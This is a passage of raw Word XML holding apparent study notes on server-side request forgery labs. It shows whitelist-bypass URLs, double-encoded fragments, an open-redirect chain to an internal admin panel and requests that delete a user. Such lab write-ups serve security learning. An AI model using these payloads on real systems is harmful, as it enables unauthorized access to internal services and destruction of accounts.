    <w:p w14:paraId="391D40A1" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="32452978" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0047658A" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0047658A">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254B74A" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0047658A">
        <w:t xml:space="preserve">EXPERT </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="0047658A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SSRF with whitelist-based input filter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0047658A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001E42B0">
        <w:t xml:space="preserve">This lab has a stock check feature which fetches data from an internal system. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001E42B0">
        <w:t>To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001E42B0">
        <w:t xml:space="preserve">The developer has deployed an anti-SSRF defense you will need to bypass. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27084B6E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Sol – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0442819F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">If we add </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="00A92D24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00A92D24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://127.0.0.1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> or http://127.1 it giving 404 "External stock check host must be stock.weliketoshop.net"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>So here stock.weliketoshop.net is whitelisted so it taking it as valid i/p it should include in URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06736F41" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:anchor="@stock.weliketoshop.net" w:history="1">
        <w:r w:rsidRPr="00A92D24">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost#@stock.weliketoshop.net</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> if send it is giving 404 "External stock check host must be stock.weliketoshop.net" </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>It is ignoring stock.weliketoshop.net cause URL parser it taking part that is present after http:// as a URL and part before #@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157FD6D3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50EE05AF" wp14:editId="565CE2FD">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="89901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1703" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="646117B2" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="7BD6E698" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>To override it do encoding of # character 2 times. (if done 1 time -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4A27">
        <w:t>"External stock check host must be stock.weliketoshop</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">-&gt; Now it is giving 200. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="447CEAA3" wp14:editId="07424A2E">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="207710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08407" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E595ABD" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve"> Now we have accessed the server and admin location on server. Add /admin after URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FAF8E0" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15248DD2" wp14:editId="3661733A">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49987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75205" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A78B9" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Now add /delete?username=carlos </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576638C2" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538E4BEA" wp14:editId="150333AA">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="143691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18215" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C4585" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E1CA90" wp14:editId="0F24CCEF">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9027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1603" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1123A708" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>302 good now follow redirection or /admin to check user is deleted or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCB9BB9" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="6121DC6D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F63975">
        <w:t>Bypassing SSRF filters via open redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1221BA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">It is sometimes possible to bypass filter-based defenses by exploiting an open redirection vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4DE7F" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">In the previous example, imagine the user-submitted URL is strictly validated to prevent malicious exploitation of the SSRF behavior. However, the application whose URLs are allowed contains an open redirection vulnerability. Provided the API used to make the back-end HTTP request supports redirections, you can construct a URL that satisfies the filter and results in a redirected request to the desired back-end target. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF886C8" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">For example, the application contains an open redirection vulnerability in which the following URL: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05575591" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/product/nextProduct?currentProductId=6&amp;path=http://evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027A43EB" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">returns a redirection to: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C303E" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482371E6" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">You can leverage the open redirection vulnerability to bypass the URL filter, and exploit the SSRF vulnerability as follows: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D557F4" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">POST /product/stock HTTP/1.0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Content-Type: application/x-www-form-urlencoded </w:t>
      </w:r>
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Content-Length: 118 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A174B1">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:br/>
        <w:t>stockApi=http://weliketoshop.net/product/nextProduct?currentProductId=6&amp;path=http://192.168.0.68/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9BE57D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">This SSRF exploit works because the application first validates that the supplied stockAPI URL is on an allowed domain, which it is. The application then requests the supplied URL, which triggers the open redirection. It follows the redirection, and makes a request to the internal URL of the attacker's choosing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BFA895" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="53B30A22" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00A174B1" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">LAB </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698A86D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00836814" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00A174B1">
        <w:t xml:space="preserve">PRACTITIONER </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00A174B1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SSRF with filter bypass via open redirection vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Sol- </w:t>
      </w:r>
      <w:r w:rsidRPr="00836814">
        <w:t xml:space="preserve">This lab has a stock check feature which fetches data from an internal system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79821604" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="00836814" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="00836814">
        <w:t>To solve the lab, change the stock check URL to access the admin interface at http://192.168.0.12:8080/admin and delete the user carlos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E938F0B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>It also has Next Product functionality capture this too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE34893" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>In Check stock</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>stockApi is not using URL it is using path of directory.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00836814">
        <w:t>/product/stock/check?productId=1&amp;storeId=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364165B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="00AB6263">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localostt/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00836814">
        <w:t>"Invalid external stock check url 'Invalid URL'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BA6A90" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="7796F76B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Got to next product tab </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA60FB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>GET /product/nextProduct?currentProductId=1&amp;path=/product?productId=2</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">if we send it and follow redirection we are redirecting to </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA60FB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>GET /product?productId=2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">So we go back and add </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA60FB">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to vulnerable site it is redirecting to that vulnerable site. i.e. it has redirection vulnerability / open redirect vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759EAD4B" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11D69F67" wp14:editId="71ADFD32">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="169025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54657" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B05F6" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="1BD0A7FA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Follow redirection -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8F418" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AD74BA5" wp14:editId="707DC2BE">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="21057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0225" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E490120" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Now copy path of next product </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/product/nextProduct?currentProductId=1&amp;path=/product?productId=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2 and replace path with </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidRPr="00836814">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.0.12:8080/admin</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  [url should be encoded otherwise not going to accept]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BD229D" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t xml:space="preserve">Application will validate actual API path </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E28">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/product/nextProduct?currentProductId=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and process it then go for path param and execute it and access admin panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE5896C" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23A4F002" wp14:editId="09982F4F">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="92459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93725" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5CA68" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>Now find path of to delete carlos in code and enter it in. (</w:t>
      </w:r>
      <w:r w:rsidRPr="0029794D">
        <w:t>/delete?username=carlo</w:t>
      </w:r>
      <w:r>
        <w:t>s)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>It will delete carlos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC2BDEA" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="68FC9472" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="3CD7BC78" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E5B8E1E" wp14:editId="0967D305">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="131371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11461" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3223895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B662661" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r>
        <w:t>No carlos there so it deleted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DB2876" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52"/>
    <w:p w14:paraId="6AAC0CCF" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0029794D">
        <w:t>Blind SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65744826" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">Blind SSRF vulnerabilities occur if you can cause an application to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application's front-end response. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900C9AC" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">Blind SSRF is harder to exploit but sometimes leads to full remote code execution on the server or other back-end components. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E45AC97" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="0029794D">
        <w:t>Finding hidden attack surface for SSRF vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB0649" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">Many server-side request forgery vulnerabilities are easy to find, because the application's normal traffic involves request parameters containing full URLs. Other examples of SSRF are harder to locate. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162CC184" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="0029794D">
        <w:t>Partial URLs in requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0891C3" w14:textId="77777777" w:rsidR="00E50F52" w:rsidRPr="0029794D" w:rsidRDefault="00E50F52" w:rsidP="00E50F52">
      <w:r w:rsidRPr="0029794D">
        <w:t xml:space="preserve">Sometimes, an application places only a hostname or part of a URL path into request parameters. The value submitted is then incorporated server-side into a full URL that is requested. If the value is readily recognized as a hostname or URL path, the potential attack surface might be obvious. However, exploitability as full SSRF might be limited because you do not control the entire URL that gets requested. </w:t>
      </w:r>
    </w:p>
